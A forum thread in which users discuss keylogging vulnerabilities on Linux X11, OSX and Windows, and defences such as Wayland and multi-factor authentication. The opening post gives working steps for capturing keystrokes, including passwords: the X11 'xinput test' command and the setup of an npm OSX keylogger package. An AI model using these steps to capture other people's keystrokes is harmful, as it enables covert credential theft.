Hello,

I have been looking into keyloggers, and making some scary discoveries.

On Linux

For any X11 apps - that is still most graphical apps - it's really easy. Proof of concept:
In a terminal emulator, type 'xinput', and find the id for your keyboard. Then type "xinput test <id>" (replace <id> with the right number - you might have to do several tries).

Now go to any other app (Firefox, whatever) and type something. Even a password in another terminal window, you will see all your keystrokes appear. Basically any graphical app (X11 client) can listen to all keystrokes. Thankfully X11 is to be replaced by Wayland, which does not have this vulnerability. However we're not there yet.

On OSX

I found this:
https://www.npmjs.com/package/osx-keylogger

If you have node installed, it's easy to set up. Just install the module, then create a javascript script by pasting the short example code. You might have to replace "swedish.json" with the correct path, depending where the swedish.json file is in relation to your example script. I had to replace it with 'node_modules/osx-keylogger/swedish.json'. Then just run that script, for example "node example.js".

Again, it will catch any keystrokes that I type in another window (such as Firefox).
I tested it on OSX 10.11.6, and it launched without requesting any permissions or any warning.
It would not capture passwords in Firefox, Safari, and also OSX password prompts (when requesting administrative access). However it did capture passwords fields in HTML forms in Chrome. And of course it did capture other information such as username and anything that I was typing, which was not protected.

So there is a security feature in OSX, to block keyloggers when entering passwords, but Chrome (63.0.3239.132) is not making use of it.

I would like anyone, if possible to please confirm the OSX test, on a newer version of OSX.

On Windows

I haven't done any tests on Windows. Some researching left me with the impression that it's more complicated to do this on modern versions of Windows without triggering any sort of warning or confirmation, due to various safeguards that were added.

The implications of such vulnerabilities are worrying. It means that any software that we download on the internet could possibly have malicious code to silently capture sensitive information and send them to someone.
On windows you can do compiled autohotkey scripts I think. What are the alternatives to typing your password?
Jerome wroteOn windows you can do compiled autohotkey scripts I think. What are the alternatives to typing your password?
You can use an on-screen keyboard, and your mouse, to type in the password. On X11 you can forget about that - in addition to reading keyboard input, all X clients can get screen grabs.

I don't think there is an alternative to well designed, secure software. On Linux I use Wayland instead of X11, which isolates different clients. X11 was created decades ago. Nowadays we have the habit of downloading many small programs on the internet, so there needs to be another security model, and X11 does not seem to have evolved too much in that direction.

In my opinion the best security model is Android's. Every app runs in some sort of container (Dalvik VM) and every app is assigned a different user, so there is no mingling, except when apps are given special permissions. The other thing is also the permission/capability model which is the way to go, as opposed to the ACL model of Windows.

Unfortunately I haven't found an equivalent level of security for desktop systems, not with the same level of usability and maturity, and Android x-86 is pretty experimental stuff.

Desktop systems have all more or less progressed from an "open" system where every app can do anything, and have piled up restrictions and protection mechanisms on top of that. Not optimal nor elegant, but it works somehow.

How would autohotkey help? Do you have a particular use case in mind? Do you mean to enter the password once only? Than sounds more secure, yes.
i have a concept, and partially working hardware (didnt found proper display for it, to complete). Encrypted keypad, that encrypts data directly in keypad, operating with keys of authorized websites. Fake website just wont be able request password,so keypad wont turn on even for malware/fake website, and any malicious software wont be able to decipher it as well. even if they intercept it.
Alternatives is smartcards, for example, but i believe they can be compromised, as PIN is entered on PC, and it is usually weak.
I believe other ways is not reliable at any case, especially with recently discovered attacks like Meltdown and Spectre.
So the data will be encrypted for all the way from the hardware to the remote servers. I think that's a good concept.
I'm just wondering how this will integrate with existing systems, for example, a web browser, which would expect keystrokes. It might get a little complicated.
8 months later
I use multi factor authentication when I can, and keys instead of passwords when possible.
rolf wrote On Linux I use Wayland instead of X11, which isolates different clients.
May I ask which distro? Did it come with wayland by default?
And what about Xwayland? Doesn't wayland still run an X server on top of itself for backwards compatibility? Thus apps that use X will still be vulnerable to this?
nuclearcat wrote i have a concept, and partially working hardware (didnt found proper display for it, to complete). Encrypted keypad, that encrypts data directly in keypad, operating with keys of authorized websites.
That is an amazing idea. I'm aware of keystroke encryption being implemented in software and wireless keyboards, but your idea seems totally new. Though it would make keyboards much more expensive if they have to receive, store and use encryption keys. The general public might not care for such things, but I'm sure many will love it.
nxnjz wroteI use multi factor authentication when I can, and keys instead of passwords when possible.
rolf wrote On Linux I use Wayland instead of X11, which isolates different clients.
May I ask which distro? Did it come with wayland by default?
And what about Xwayland? Doesn't wayland still run an X server on top of itself for backwards compatibility? Thus apps that use X will still be vulnerable to this?
I am Debian guy. If you install the gnome desktop then you should have the option of using Wayland.

I found gnome to be "too heavy" so I tried more minimal options such as Weston. But I gave up on this, too many bugs. I went back to Gnome.

My solution now is to use Windows for a few minutes and then go back to Linux; Gnome desktop suddenly feels very light.

By the way I'm not even sure whether I'm running gnome atop Wayland or X11 now.

I read that Ubuntu reverted to X11.

Yes, Xwayland is a part of Walyand. Only apps that use Xwayland are vulnerable to each other.
Xwayland runs as a Wayland client so it is isolated from any other Wayland clients.

However major libraries have been made compatible with Wayland such as Qt and GTK+. This means that any application built on top these libraries will run as a Wayland client so you can find many options.
rolf wroteI haven't done any tests on Windows. Some researching left me with the impression that it's more complicated to do this on modern versions of Windows without triggering any sort of warning or confirmation, due to various safeguards that were added.
On windows its also very easy. I once wrote a c++ keylogger that runs in the background. I was surprised that neither windows defender nor any antivirus (tested with AVG-Kaspersky-Avast and even Norton business installed on my university's pcs) detected anything suspicious.